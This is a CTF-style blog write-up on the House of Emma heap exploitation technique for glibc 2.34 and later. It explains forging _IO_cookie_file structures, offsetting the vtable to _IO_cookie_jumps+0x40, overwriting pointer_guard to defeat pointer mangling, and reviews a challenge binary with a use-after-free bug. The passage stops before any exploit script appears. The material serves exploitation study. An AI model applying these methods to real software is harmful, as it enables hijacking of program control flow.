Foreword

Before embarking on this deep dive into the intricacies of heap exploitation named House of Emma, we should have a fundamental understanding on the House of Kiwi from another post—the trigger of I/O operation which we are gonna exploit with House of Emma.

There are several well-regarded articles discussing the House of Emma exploitation technique. However, I've identified some key misunderstandings in the attack chain. Why do we alter the vtable pointer to _IO_cookie_jumps with an offset of 0x40? Why place our malicious gadget at offset 0xF0, which exceeds the length limit of a standard file struct? And what is the ultimate goal of this chain—where does it lead to hijack the RIP? Contrary to popular belief, the destination is NOT the __cookie pointer.

Even though we can now use another attack chain, House of Apple, to hijack I/O operations in a relatively simpler way, the seemingly more complex House of Emma—which requires deeper research into the TLS/TCB structure—remains an enlightening and powerful methodology in heap exploitation for high-version GLIBC such as 2.35.

In the writeup section of this article, I'll walk through a PWN challenge that exploits GLIBC 2.34, which helps us to explore these questions in depth and untangle the complexities of this technique.

Overview

In the GLIBC 2.34 release, which was made public on August 1, 2021, commonly used hooks in CTF pwn challenges, such as __free_hook and __malloc_hook, were removed. Furthermore, after glibc-2.34-0ubuntu3.2_amd64, restriction on the attack of hijacking vtable pointer in an IO struct has been applied via IO_validate_vtable which we introduced here.

Due to changes in the new version, we are forced to rethink our exploitation approach. Traditionally, we aimed for arbitrary address allocation to achieve arbitrary read/write, which eventually led to a shell. Now, the goal has shifted to directly writing to a controlled address that leads to a shell or execution flow hijacking, leveraging the IO_FILE structure used in low-level I/O operation.

Soon after the version released, a talented hacker has introduced a fantastic attack chain in this article and name it the "House of Emma".

However, the author did not explicitly explain the attack chain, and even other well-regarded articles, such as the analysis by Qianxin, a leading cybersecurity company in China, have, in my view, misinterpreted the actual execution flow.

_IO_cookie_jumps

A simple recap for the security check IO_validate_vtable:

static inline const struct _IO_jump_t *
IO_validate_vtable (const struct _IO_jump_t *vtable)
{
  /* Fast path: The vtable pointer is within the __libc_IO_vtables
     section.  */
  uintptr_t section_length = __stop___libc_IO_vtables - __start___libc_IO_vtables;
  uintptr_t ptr = (uintptr_t) vtable;
  uintptr_t offset = ptr - (uintptr_t) __start___libc_IO_vtables;
  if (__glibc_unlikely (offset >= section_length))
    /* The vtable pointer is not in the expected section.  Use the
       slow path, which will terminate the process if necessary.  */
    _IO_vtable_check ();
  return vtable;
}

We can no longer hijack the vtable pointer in the _IO_FILE_plus struct with arbitrary values, but only within the section of __libc_IO_vtables. Thus, the House of Emma introduces a methodology to complete the attack while adhering to these restrictions. By modifying the vtable pointer to _IO_xxxx_jumps and applying a slight offset, we can manipulate the normal execution flow to redirect it to other executable functions. These functions reference an IO_FILE structure that we control through some other arbitrary-address-write primitive, such as the Largebin Attack introduced in this post.

Unlike techniques such as House of Apple or House of Cat, where the vtable is replaced with _IO_wfile_jumps, in this case, we leverage _IO_cookie_jumps, which follows a similar structure:

static const struct _IO_jump_t _IO_cookie_jumps libio_vtable = {
  JUMP_INIT_DUMMY,                              // Offset: 0x00, Size: 0x10 (Dummy entry)
  JUMP_INIT(finish, _IO_file_finish),           // Offset: 0x10, Size: 0x08
  JUMP_INIT(overflow, _IO_file_overflow), 		// Offset: 0x18, Size: 0x08
  JUMP_INIT(underflow, _IO_file_underflow),		// Offset: 0x20, Size: 0x08
  JUMP_INIT(uflow, _IO_default_uflow), 			// Offset: 0x28, Size: 0x08
  JUMP_INIT(pbackfail, _IO_default_pbackfail), 	// Offset: 0x30, Size: 0x08
  JUMP_INIT(xsputn, _IO_file_xsputn),           // Offset: 0x38, Size: 0x08
  JUMP_INIT(xsgetn, _IO_default_xsgetn),        // Offset: 0x40, Size: 0x08
  JUMP_INIT(seekoff, _IO_cookie_seekoff),       // Offset: 0x48, Size: 0x08
  JUMP_INIT(seekpos, _IO_default_seekpos),      // Offset: 0x50, Size: 0x08
  JUMP_INIT(setbuf, _IO_file_setbuf),           // Offset: 0x58, Size: 0x08
  JUMP_INIT(sync, _IO_file_sync),       		// Offset: 0x60, Size: 0x08
  JUMP_INIT(doallocate, _IO_file_doallocate),   // Offset: 0x68, Size: 0x08
  JUMP_INIT(read, _IO_cookie_read),             // Offset: 0x70, Size: 0x08
  JUMP_INIT(write, _IO_cookie_write),           // Offset: 0x78, Size: 0x08
  JUMP_INIT(seek, _IO_cookie_seek),             // Offset: 0x80, Size: 0x08
  JUMP_INIT(close, _IO_cookie_close),           // Offset: 0x88, Size: 0x08
  JUMP_INIT(stat, _IO_default_stat),            // Offset: 0x90, Size: 0x08
  JUMP_INIT(showmanyc, _IO_default_showmanyc),  // Offset: 0x98, Size: 0x08
  JUMP_INIT(imbue, _IO_default_imbue)           // Offset: 0xA0, Size: 0x08
};

This particular vtable uses the struct _IO_jump_t. The function pointers inside are initialized via the JUMP_INIT macro, and each corresponds to a specific operation in the vtable.

_IO_cookie_xxxx

In typical situations, the _IO_cookie_jumps vtable pointer is set when the fopencookie function is called. Well then, in an attack scenario, once we successfully modify the vtable pointer to _IO_cookie_jumps, several functions within this vtable—such as _IO_cookie_read, _IO_cookie_write, _IO_cookie_seek, and _IO_cookie_close—can potentially lead to arbitrary function or pointer execution—when we have controlled the memory data at specific offset on a hijacked IO_FILE.

Function _IO_cookie_read at offset 0x70:

static ssize_t
_IO_cookie_read (FILE *fp, void *buf, ssize_t size)
{
  struct _IO_cookie_file *cfile = (struct _IO_cookie_file *) fp;
  cookie_read_function_t *read_cb = cfile->__io_functions.read;
#ifdef PTR_DEMANGLE
  PTR_DEMANGLE (read_cb);
#endif
 
  if (read_cb == NULL)
    return -1;
 
  return read_cb (cfile->__cookie, buf, size);
}

Function _IO_cookie_write at offset 0x78:

static ssize_t
_IO_cookie_write (FILE *fp, const void *buf, ssize_t size)
{
  struct _IO_cookie_file *cfile = (struct _IO_cookie_file *) fp;
  cookie_write_function_t *write_cb = cfile->__io_functions.write;
#ifdef PTR_DEMANGLE
  PTR_DEMANGLE (write_cb);
#endif
 
  if (write_cb == NULL)
    {
      fp->_flags |= _IO_ERR_SEEN;
      return 0;
    }
 
  ssize_t n = write_cb (cfile->__cookie, buf, size);
  if (n < size)
    fp->_flags |= _IO_ERR_SEEN;
 
  return n;
}

Function _IO_cookie_seek at offset 0x80:

static off64_t
_IO_cookie_seek (FILE *fp, off64_t offset, int dir)
{
  struct _IO_cookie_file *cfile = (struct _IO_cookie_file *) fp;
  cookie_seek_function_t *seek_cb = cfile->__io_functions.seek;
#ifdef PTR_DEMANGLE
  PTR_DEMANGLE (seek_cb);
#endif
 
  return ((seek_cb == NULL
       || (seek_cb (cfile->__cookie, &offset, dir)
           == -1)
       || offset == (off64_t) -1)
      ? _IO_pos_BAD : offset);
}

Function _IO_cookie_close at offset 0x88:

static int
_IO_cookie_close (FILE *fp)
{
  struct _IO_cookie_file *cfile = (struct _IO_cookie_file *) fp;
  cookie_close_function_t *close_cb = cfile->__io_functions.close;
#ifdef PTR_DEMANGLE
  PTR_DEMANGLE (close_cb);
#endif
 
  if (close_cb == NULL)
    return 0;
 
  return close_cb (cfile->__cookie);
}

They all eventually calls functions look like xxxx_cb and takes an argument cfile, which refers to another IO_FILE struct as part of the extension to the original _IO_FILE.

struct _IO_cookie_file

The variable cfile is used to refer to those functions. From the internal C library functions mentioned above, we can see that it belongs to the _IO_cookie_file structure:

/* Special file type for fopencookie function.  */
struct _IO_cookie_file
{
  struct _IO_FILE_plus __fp;
  void *__cookie;	// offset: 0xE0
  cookie_io_functions_t __io_functions;	// offset: 0xE8
};

It has a larger structure than the standard _IO_FILE_plus (ending at offset 0xD8), adding new members from offset 0xE0.

__io_functions

From offset 0xE8 of the struct _IO_cookie_file, sits the __io_functions pointer, which belongs to a special structure cookie_io_functions_t:

type = struct _IO_cookie_io_functions_t {
    cookie_read_function_t *read;		// Offset: 0x00, 0xE8 in _IO_cookie_file 
    cookie_write_function_t *write;		// Offset: 0x08, 0xF0 in _IO_cookie_file 
    cookie_seek_function_t *seek;		// Offset: 0x10, 0xF8 in _IO_cookie_file 
    cookie_close_function_t *close;		// Offset: 0x18, 0x100 in _IO_cookie_file 
}

This is the real destination of the attack chain for House of Emma, where we hijack the rip to an evil pointer.

PTR_DEMANGLE

If we look carefully, there's special a preprocessor directive (#ifdef) and a function-like macro (PTR_DEMANGLE) inside each function snippet:

#ifdef PTR_DEMANGLE
 PTR_DEMANGLE (write_cb);
#endif
  • If PTR_DEMANGLE is defined, the code between the #ifdef and the corresponding #endif is included in the compilation.
  • If PTR_DEMANGLE is not defined, the code block is ignored.

This is a security measure to prevent attackers manipulating function pointers:

extern uintptr_t __pointer_chk_guard attribute_relro;
#  define PTR_MANGLE(var) \
  (var) = (__typeof (var)) ((uintptr_t) (var) ^ __pointer_chk_guard)
#  define PTR_DEMANGLE(var) PTR_MANGLE (var)

Take the _IO_cookie_write function as an example, we can disassemble it in GDB:

The macro takes a pointer variable var (rdi+0xf0), converts it to a uintptr_t, and applies an XOR operation with __pointer_chk_guard from TLS Segment:

mov rax, [rdi+0xf0]
ror rax, 0x11
xor rax, fs:[0x30]

The pointer encryption guard value is initialized by the dynamic linker, which exposes two variables—__pointer_chk_guard_local is hidden and can be used by dynamic linker code to access the guard value more efficiently, and __pointer_chk_guard is global and should be used by the dynamically linked C library.

pointer_guard

The pointer_guard (__pointer_chk_guard) is the value stored at fs:[0x30] (fs:[offsetof(tcbhead_t, pointer_guard)]), used by the PTR_MANGLE and PTR_DEMANGLE macros to encrypt and decrypt function pointers, as discussed earlier.

This topic requires a solid understanding of TLS/TCB. I highly recommend the research by Chao-tic. Though it's a lengthy read, it's wonderfully written and well worth the time—I found myself reading it twice.

Here, I'll provide a brief introduction to the parts most relevant to our attack.

__pointer_chk_guard

Where can we find the pointer guard (__pointer_chk_guard)?

It's stored within a data structure known as the Thread Control Block (TCB), which holds important information and metadata to manage a thread and its associated local storage (TLS).

In Linux systems, the tcbhead_t is the specific implementation of the TCB used by LIBC.

type = struct {
/*      0      |       8 */    void *tcb;
/*      8      |       8 */    dtv_t *dtv;
/*     16      |       8 */    void *self;
/*     24      |       4 */    int multiple_threads;
/*     28      |       4 */    int gscope_flag;
/*     32      |       8 */    uintptr_t sysinfo;
/*     40      |       8 */    uintptr_t stack_guard;		// offset 0x28
/*     48      |       8 */    uintptr_t pointer_guard;		// offset 0x30
/*     56      |      16 */    unsigned long unused_vgetcpu_cache[2];
/*     72      |       4 */    unsigned int feature_1;
/*     76      |       4 */    int __glibc_unused1;
/*     80      |      32 */    void *__private_tm[4];
/*    112      |       8 */    void *__private_ss;
/*    120      |       8 */    unsigned long long ssp_base;
/*    128      |     512 */    __128bits __glibc_unused2[8][4];
/*    640      |      64 */    void *__padding[8];

                               /* total size (bytes):  704 */
                             }

At offsets 0x28 and 0x30, we encounter familiar components: the stack_guard, which holds the canary value, and the pointer_guard, which is the key used to XOR-encrypt function pointers. These values are randomly generated each time the program starts. In GDB, we can view them by inspecting the fsbase:

The fs register is commonly used in thread-local storage (TLS) and other context-sensitive data on x86 and x86_64 (AMD64) architectures, primarily used for accessing thread-specific data or CPU-specific data in a flat memory model (while Windows and macOS uses the GS register for this purpose):

  • The fs register stores a base address that points to the TLS area.
  • Using this base address, thread-local variables can be quickly accessed by adding an offset to the value in the fs register.

Thus, the pointer_guard value is located at fs[0x30], which corresponds to a specific TLS offset adjacent to the LIBC memory area. This offset remains constant, enabling predictable manipulation. However, leaking or directly modifying it is challenging—changing the fs register requires kernel-level privileges (ring 1), while we operate at ring 3 (user land). While we can retrieve the values stored in FS and GS, we cannot change their addresses.

As attackers, though, we can attempt to modify the value at this exact address using various exploit primitives, such as:

  • Fastbin Reverse Into Tcache
  • Tcache Stashing Unlink Attack
  • LargeBin Attack

Overall, the main idea is to leverage vulnerabilities to replace this random value to a known address, overcoming the protections provided by pointer encryption.

__pointer_chk_guard_local

In fact, there is a copy of the pointer guard stored as the global variable __pointer_chk_guard_local, located in the .RODATA section (read-only), which cannot be overwritten.

This copy allows for easy and fast access. When we overwrite the value at fs:[0x30], the __pointer_chk_guard_local remains unchanged.

Algorithm

Now that we know what the pointer_guard is and where it resides, we can use maths to show how the PTR_MANGLE macro encrypts function pointers and how PTR_DEMANGLE decrypts them.

For the encryption process (PTR_MANGLE):

rol(ptr ^ pointer_guard, 0x11, 64)

For the decryption process (PTR_DEMANGLE):

ror(enc, 0x11, 64) ^ pointer_guard

In an exploit scenario, if we can hijack the pointer_guard and replace it with an evil_guard (using techniques like a Largebin Attack, for example), we can then write the enc value to a controlled memory area—namely a fake _IO_cookie_file structure in House of Emma. By encrypting our malicious function pointer (ptr), we can ultimately hijack the RIP:

enc = rol(ptr ^ evil_guard, 0x11, 64)

Perquisites

To successfully carry out the House of Emma attack, the following primitives are typically required:

  • The ability to write to a controlled address arbitrarily (using techniques like LargeBin Attack, Tcache Stashing Unlink Attack, etc.).
  • The ability to trigger an I/O stream (via FSOP or House of Kiwi).

Trigger

Therefore, triggering an I/O stream is essential for exploiting heap vulnerabilities related to IO structures.

I've previously introduced methods to trigger I/O operations without the program's awareness in House of Kiwi. I won't delve into that topic here, but if needed, you can explore the detailed methodology through the link.

Simply put, one straightforward way to trigger an I/O operation is by leveraging the exit function, if present in the binary:

exit
  └───► fcloseall
            └───► _IO_cleanup
                       └───►_IO_flush_all_lockp
                                    └───►_IO_OVERFLOW

Alternatively, __malloc_assert can come into play if the allocator fails to allocate a chunk as requested:

_int_malloc
     └───►sysmalloc
             └───►__malloc_assert
                         └───► fflush(stderr)
                                  └───►_IO_file_sync

Additionally, there's another execution chain that runs before fflush is triggered:

_int_malloc
   └───► sysmalloc
            └───► __malloc_assert
                        └───► __fxprintf
                                   └───► __vfxprintf
                                              └───► __vfxprintf_internal
                                                          └───► _IO_file_xsputn

In this post introducing House of Emma, we will use the latter method to trigger I/O operations, as the upcoming PWN challenge I will analyze does not have an exit function but runs in an infinite loop.

Attack Chain

We opt to trigger __malloc_assert to initiate the I/O operation (using the House of Kiwi attack). Before the IO structure is hijacked, the binary will print an error message.

Once we hijack the vtable pointer to _IO_cookie_jumps, calling fflush(stderr) will navigate into the IO structure under our control as follows:

Let me explain explicitly what happens in the above image. Before hijacking, the flow would look like this:

stderr->_IO_file_jumps->_IO_file_xsputn

After hijacking stderr, we can overwrite its vtable pointer at offset 0xD8 with the pointer to _IO_cookie_jumps, resulting in the following flow:

(hijacked)stderr->_IO_cookie_jumps->_IO_new_file_xsputn

However, executing _IO_new_file_xsputn doesn't allow for arbitrary function pointer execution, which is not our goal. This is where the House of Emma introduces a key technique—offsetting the vtable pointer

Specifically, after hijacking stderr, we can write _IO_cookie_jumps+0x40 into the vtable pointer position. This offsets the execution flow, redirecting it to _IO_cookie_write:

Notice that rdi (and rbx) points to the heap address, aka the fake stderr, we are in control. It is now:

(hijacked)stderr->_IO_cookie_jumps+0x40->_IO_cookie_write

Therefore, the full Attack Chain for House of Emma can be depicted as:

__malloc_assert
     └───►__fxprintf
               └───► _IO_default_xsputn (before)
                          └───► _IO_cookie_write (after)
        	                     └───► write_cb (cfile->__cookie, buf, size)

Alternatively, we can hijack the _IO_file_sync pointer in the fake stderr structure to exploit fflush(stderr). Additionally, we can select any of the _IO_cookie_xxxx functions (read, seek, close), not just the write function, by adjusting the corresponding offset.

So, what happens after hijacking the vtable pointer to _IO_cookie_jumps+0x40, ultimately leading to the desired endpoint, write_cb? Let's first take a preliminary look at an attack demo running in GDB to better understand the overall scenario.

Once we've set up the deployment as discussed earlier, we can dive deeper into the behavior of the _IO_cookie_write function and observe its unusual, manipulated execution flow:

The value stored at [rdi+0xe0] is used as the first argument for the upcoming function call to write_cb. Before this operation, rdi points to the cfile (the fake _IO_cookie_file structure), as it is the first argument of the current function call, _IO_cookie_write.

At offset 0xE0 of the fake _IO_cookie_file, we have the void* __cookie pointer, which we can hijack to pass as the first argument to our malicious function.

Then it mov rax, [rdi+0xf0] as the encrypted function pointer and will pass it to rip (namely executing write_cb) after decrypting it with the hijacked pointer_guard:

We can notice that I placed a well-constructed value into this specific position, which can be decrypted by the PTR_DEMANGLE macro as the evil gadget—getkeyserv_handle+576:

After controlling the rdx register with this evil gadget, we can then continue the classic exploit chain using the setcontext+61 gadget. We will show the remaining part in our exploit script for the PWN challenge.

All mentioned evil gadget are introduced in this post.

In conclusion, we need to fake the stderr and _IO_cookie_file structure, especially hijacking the values at offset 0xE0 and 0xF0 on the fake _IO_cookie_file. But, why here?

Debug

To understand how the House of Emma works, we need to take a closer look at the execution flow triggered by the _IO_cookie_jumps pointer.

As mentioned earlier, when the vtable pointer is overwritten with the _IO_cookie_pointer or its relative offset, the program references this jump table and executes the corresponding function pointers. Additionally, the read, write, seek, and close functions refer to the _IO_cookie_file structure, a specialized case of _IO_FILE designed for user-defined I/O operations.

Typically, this structure is used when fopencookie is called to create a custom I/O stream with user-specified operations for reading, writing, seeking, and closing.

Demo Code

Now, let's examine the typical case before the I/O stream is exploited. I've designed a C script and compiled it to test the fopencookie function:

#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

// Custom write function
ssize_t my_write(void *cookie, const char *buf, size_t size) {
    printf("Custom write function called with size: %zu\n", size);
    printf("Buffer contents: %.*s\n", (int)size, buf);

    // Accessing the cookie data for demonstration purposes
    if (cookie != NULL) {
        int *my_cookie = (int *)cookie;
        printf("Cookie value: %d\n", *my_cookie);
    }

    return size;
}

// Custom read function
ssize_t my_read(void *cookie, char *buf, size_t size) {
    static int called = 0;  // Track how many times my_read has been called
    const char *data = "Hello, world!";
    size_t len = strlen(data);

    if (called > 0) {
        // Simulate end-of-file after the first read
        return 0;  // No more data to read
    }

    if (size > len) size = len;
    memcpy(buf, data, size);
    called++;  // Increment the counter to prevent further reads

    printf("Custom read function called, providing data.\n");
    return size;  // Return the number of bytes read
}

int main() {
    // Set up the cookie with custom data
    int cookie_data = 0xdeadbeef;
    
    // Set up the cookie IO functions
    cookie_io_functions_t io_funcs = {
        .read = my_read,
        .write = my_write,
        .seek = NULL,
        .close = NULL
    };

    // Create a custom stream with fopencookie, using the custom cookie
    FILE *custom_stream = fopencookie(&cookie_data, "w+", io_funcs);

    if (!custom_stream) {
        perror("Failed to open custom stream");
        return 1;
    }

    // Write to the custom stream to trigger the custom write function
    fprintf(custom_stream, "Test writing to custom stream.\n");
    fflush(custom_stream);

    // Close the custom stream
    fclose(custom_stream);

    return 0;
}
// gcc -g -o fopencookie fopencookie.c

This C code defines custom functions like my_read, my_write, etc. They're designed to simulate the behavior of reading/writing from a custom file-like object created using fopencookie in GLIBC. The custom functions are part of the cookie_io_functions_t structure, which allows us to define our own read, write, seek, and close operations for file streams.

Goal

The objective of the debugging process here is to understand and debug how the my_write function operates as a child function of the cookie_io_functions_t structure, which is called internally by _IO_cookie_write in glibc:

To solve our questions for House of Emma, we will:

  • Investigate the _IO_cookie_file structure to understand how it stores the custom I/O functions (such as my_read and my_write).
  • Debug the behavior of the __io_functions field within GLIBC to understand how the fopencookie mechanism uses it to handle custom file operations.

Go-Through

Our ultimate goal in the House of Emma exploit is to hijack _IO_cookie_write. To further analyze this, we can set a breakpoint at this function and inspect it in GDB:

It behaves exactly the same as we introduced in previous chapters. We know its 1st argument is FILE *fp referring to rdi register. Let's grep the source code of the _IO_cookie_write function below:

static ssize_t
_IO_cookie_write (FILE *fp, const void *buf, ssize_t size)
{
  struct _IO_cookie_file *cfile = (struct _IO_cookie_file *) fp;
  cookie_write_function_t *write_cb = cfile->__io_functions.write;
#ifdef PTR_DEMANGLE
  PTR_DEMANGLE (write_cb);
#endif
 
  if (write_cb == NULL)
    {
      fp->_flags |= _IO_ERR_SEEN;
      return 0;
    }
 
  ssize_t n = write_cb (cfile->__cookie, buf, size);
  if (n < size)
    fp->_flags |= _IO_ERR_SEEN;
 
  return n;
}

In this function, the FILE *fp argument is cast to the _IO_cookie_file structure. This cast transforms the generic FILE stream pointer into the more specific _IO_cookie_file structure, which is used when working with custom I/O operations through fopencookie.

Take an inspection on fp at runtime:

A closer observation at fp, aka the cfile, as the structure _IO_cookie_file:

The vtable now points to _IO_cookie_jumps as we exactly expect. And outside the file structure, at offset 0xE0, sits the __cookie pointer pointing to void* cookie—the 1st of all 3 arguments of our demo function my_write, simulating the write_cb (cfile->__cookie, buf, size) function in GLIBC:

It contains the 4-byte int type data we set in the C code:

And inside the __io_function block starting from offset 0xE8, which appears to be another structure, includes 4 function pointers which seems to be obfuscated:

According to the GLIBC source code, it will execute write_cb, namely the write pointer inside this structure:

But it cannot be disassembled apparently. Because they are all encrypted by the PTR_MANGLE pointer as we introduced.

Let's try to decrypt this one using the algorithm illustrated in previous chapters. First we will need to know the pointer_guard valued randomly generated at runtime, which is stored at fs:[0x30]:

Extract these values and apply the decryption algorithm by PTR_DEMANGLE:

ror(enc, 0x11, 64) ^ pointer_guard

In our demo, it should be calculated as:

ror(0x45784fde6bfd6c6a, 0x11, 64) ^ 0xb63577e972ba6797

Calculate the result:

def ror(value, shift, bit_size):
    """Performs a bitwise right rotate (ROR) on the given value."""
    return ((value >> shift) | (value << (bit_size - shift))) & ((1 << bit_size) - 1)

# Encrypted value and pointer guard
encrypted_value = 0x45784fde6bfd6c6a
pointer_guard = 0xb63577e972ba6797
shift_value = 0x11  # The shift for the ROR operation
bit_size = 64       # 64-bit values

# Apply the ROR and XOR with pointer_guard
decrypted_value = ror(encrypted_value, shift_value, bit_size) ^ pointer_guard
decrypted_value

We have a result of 93824992236137 (0x555555555269 in hexadecimal). Now it looks like a valid function pointer which can be disassembled:

Exactly! This is the my_write function defined in the C code for io_funcs.write, which follows the same structure as cookie_io_functions_t. If we can hijack this value at offset 0xF0 within the _IO_cookie_file structure, we can take control of rip—and ultimately hijack the entire execution flow!

End

In conclusion, the target of the attack chain in the House of Emma exploit is the __io_functions.write function, located at offset 0xF0 within the _IO_cookie_file structure. This function references the __cookie pointer, which is used as the first argument (rdi) and is positioned at offset 0xE0.

The attack chain can be depicted as:

_IO_cookie_write
      └───► write_cb
    	       └───►*(cfile.__io_functions.write)(__cookie, buf, size)

Writeup

In the final chapter, I will share a writeup on exploiting a PWN challenge using the House of Emma methodology, combined with the I/O stream stringer strategy from House of Kiwi.

Binary: link

EXP template: link

Impression

With full protection enabled on the binary within a sandbox, we can still exploit it using the ORW (Open, Read, Write) attack introduced here:

This is not a typical program—it behaves like a virtual machine, telling us only to supply opcodes in binary form:

We can input binary data for a program in Linux system like the following operation, which can be helpful for our debugging:

But obviously we provided a meaningless test payload and the program returns "Invalid opcode" in an infinite loop:

To understand how this program operates, we must decompile the binary to uncover its functionality.

Code Review

Since the main function lacks an exit function and only uses _exit in other functions—which won't trigger I/O operations necessary for our FSOP attack—we need to leverage the House of Kiwi primitive to perform the exploit by triggering __malloc_error.

Main

void __fastcall __noreturn main(__int64 a1, char **a2, char **a3)
{
  void *s; // [rsp+8h] [rbp-8h]

  setup(a1, a2, a3);
  while ( 1 )
  {
    puts("Pls input the opcode");
    s = malloc(0x2000uLL);
    memset(s, 0, 0x2000uLL);
    read(0, s, 0x500uLL);
    vm_run(s);
    free(s);
  }
}

It runs an infinite loop, repeatedly asking for user input (opcodes) and executing them in a virtual machine-like environment.

The while (1) loop continuously runs the following operations:

  • s = malloc(0x2000uLL): Allocates 0x2000 bytes of memory to hold the user's input.
  • memset(s, 0, 0x2000uLL): Clears the allocated memory by setting it to zero.
  • read(0, s, 0x500uLL): Reads up to 0x500 bytes from the standard input (file descriptor 0, i.e., stdin) into the allocated memory s.
  • vm_run(s): Passes the input to a function called vm_run, which interprets and executes the opcodes in the memory pointed to by s.
  • free(s): Frees the allocated memory after vm_run completes.

Setup

int sub_16D5()
{
  // ... omit variables
  
  v35 = __readfsqword(0x28u);
  setvbuf(stdin, 0LL, 2, 0LL);
  setvbuf(stdout, 0LL, 2, 0LL);
  setvbuf(stderr, 0LL, 2, 0LL);
  prctl(38, 1LL, 0LL, 0LL, 0LL);
  
  // ... omit dereference
  
  return prctl(22, 2LL, &v1);
}

Usually we don't pay a lot attention on the setup function. This one is related to some thread setup via prctl syscall which plays an important role in TLS/TCB context.

  1. Set Buffering Mode for I/O Streams:
    • The calls to setvbuf(stdin, 0LL, 2, 0LL), setvbuf(stdout, 0LL, 2, 0LL), and setvbuf(stderr, 0LL, 2, 0LL) disable buffering for stdin, stdout, and stderr streams. This means all input/output operations are immediate without buffering, often done to avoid delays in interactive programs.
  2. prctl(38, 1LL, 0LL, 0LL, 0LL):
    • The prctl(38, 1LL, 0LL, 0LL, 0LL) call corresponds to the PR_SET_NO_NEW_PRIVS option (38), which restricts the process from gaining new privileges. Setting it to 1LL means that no new privileges will be granted (for example, after a setuid or setgid change).
  3. prctl(22, 2LL, &v1):
    • This call is related to PR_SET_PDEATHSIG (22), which sets a signal that the kernel will send to the process when its parent dies. In this case, it appears to be setting a signal (likely SIGINT or SIGKILL) that will trigger when the parent process dies, based on the v1 variable, which is initialized to 8 (possibly SIGFPE or another signal).

Add

_DWORD *__fastcall add(__int64 a1)
{
  _DWORD *result; // rax
  unsigned __int8 idx; // [rsp+1Dh] [rbp-13h]
  unsigned __int16 size; // [rsp+1Eh] [rbp-12h]

  idx = *(_BYTE *)(a1 + 1);
  size = *(_WORD *)(a1 + 2);
  if ( size <= 0x40Fu || size > 0x500u || idx > 0x10u )
  {
    puts("ERROR");
    _exit(0);
  }
  pool[idx] = calloc(1uLL, size);
  result = size_pool;
  size_pool[idx] = size;
  return result;
}

The add function reads an index (idx) and a size (size) from a specified memory location, validates them, allocates memory from a pool if the values are valid, and stores the size of the allocated memory.

If the inputs are invalid, restricting the allocated chunk size within 0x410 to 0x500, it terminates the program.

Delete

void __fastcall delete(__int64 a1)
{
  unsigned __int8 idx; // [rsp+1Fh] [rbp-1h]

  idx = *(_BYTE *)(a1 + 1);
  if ( idx > 0x10u || !*((_QWORD *)&pool + idx) )
  {
    puts("Invalid idx");
    _exit(0);
  }
  free(*((void **)&pool + idx));
}

It does not clear out the pointer after free'ing a chunk. This resides a typical UAF vulnerability, which results in chunk overlapping.

Show

int __fastcall show(__int64 a1)
{
  unsigned __int8 idx; // [rsp+1Fh] [rbp-1h]

  idx = *(_BYTE *)(a1 + 1);
  if ( idx > 0x10u || !*((_QWORD *)&pool + idx) )
  {
    puts("Invalid idx");
    _exit(0);
  }
  return puts(*((const char **)&pool + idx));
}

With the UAF primitive, we can leverage this to print out leaked information. And there's no boundary check here.

Edit

void *__fastcall edit(__int64 a1)
{
  unsigned __int8 idx; // [rsp+1Dh] [rbp-3h]
  unsigned __int16 size; // [rsp+1Eh] [rbp-2h]

  idx = *(_BYTE *)(a1 + 1);
  size = *(_WORD *)(a1 + 2);
  if ( idx > 0x10u || !*((_QWORD *)&pool + idx) )
  {
    puts("Invalid idx");
    _exit(0);
  }
  if ( (unsigned int)size > size_pool[idx] )
  {
    puts("Invalid size");
    size = size_pool[idx];
  }
  return memcpy(*((void **)&pool + idx), (const void *)(a1 + 4), size);
}

Edit specific opcodes (in the pool) via the idx variable.

Vm_run

__int64 __fastcall vm_run(__int64 a1)
{
  while ( 1 )
  {
    switch ( *(_BYTE *)a1 & 0xF )
    {
      case 1:
        add(a1);
        a1 += 4LL;
        puts("Malloc Done");
        break;
      case 2:
        delete(a1);
        a1 += 2LL;
        puts("Del Done");
        break;
      case 3:
        show(a1);
        a1 += 2LL;
        puts("Show Done");
        break;
      case 4:
        edit(a1);
        a1 += *(unsigned __int16 *)(a1 + 2) + 4LL;
        puts("Edit Done");
        break;
      case 5:
        return 0LL;
      case 6:
        *(_WORD *)(a1 + 3) = *(unsigned __int8 *)(a1 + 2) + *(unsigned __int8 *)(a1 + 1);
        a1 += 5LL;
        break;
      case 7:
        *(_WORD *)(a1 + 3) = *(unsigned __int8 *)(a1 + 2) - *(unsigned __int8 *)(a1 + 1);
        a1 += 5LL;
        break;
      case 8:
        *(_WORD *)(a1 + 3) = (unsigned __int8)(*(_BYTE *)(a1 + 1) ^ *(_BYTE *)(a1 + 2));
        a1 += 5LL;
        break;
      case 9:
        *(_WORD *)(a1 + 3) = *(unsigned __int8 *)(a1 + 2) * *(unsigned __int8 *)(a1 + 1);
        a1 += 5LL;
        break;
      case 0x10:
        *(_WORD *)(a1 + 3) = (unsigned __int8)(*(_BYTE *)(a1 + 2) / *(_BYTE *)(a1 + 1));
        a1 += 5LL;
        break;
      default:
        puts("Invalid opcode");
        break;
    }
  }
}

The vm_run function acts like a virtual machine interpreter, continuously reading and executing commands based on a series of opcodes from the memory location pointed to by a1. Each opcode determines the operation to be performed.

  1. Infinite Loop:
    • The function runs an infinite loop (while (1)) and reads opcodes from the memory location at a1.
  2. Opcode Handling:
    • The function checks the opcode by evaluating *(_BYTE *)a1 & 0xF, which extracts the lower 4 bits of the byte at a1. Based on this value, the function branches to different cases.
  3. Operations:
    • Case 1: Calls the add(a1) function (likely to allocate memory) and advances a1 by 4 bytes.
    • Case 2: Calls the delete(a1) function (likely to free memory) and advances a1 by 2 bytes.
    • Case 3: Calls the show(a1) function (likely to display memory) and advances a1 by 2 bytes.
    • Case 4: Calls the edit(a1) function (likely to modify memory) and advances a1 based on the value at a1 + 2 plus 4 bytes.
    • Case 5: Terminates the loop by returning 0, signaling the end of execution.
    • Cases 6-9, 0x10: Perform arithmetic operations (addition, subtraction, XOR, multiplication, and division) using values from memory, storing results at a1 + 3 and advancing a1 by 5 bytes.
  4. Error Handling:
    • If an invalid opcode is encountered, it prints "Invalid opcode" and continues.

The vm_run function is a simple virtual machine that processes opcodes, performing actions like memory allocation (add), deletion (delete), display (show), and modification (edit). The basic arithmetic operations are just for fun :). The function continuously executes until it encounters a termination opcode (5).

Methodology

The opcodes are stored in the first allocated 0x2000 chunk, and will be cleared out each time we quit an infinite loop of the vm_run function (by option 5):

With the vulnerabilities identified through code review, we can exploit this challenge by following these steps:

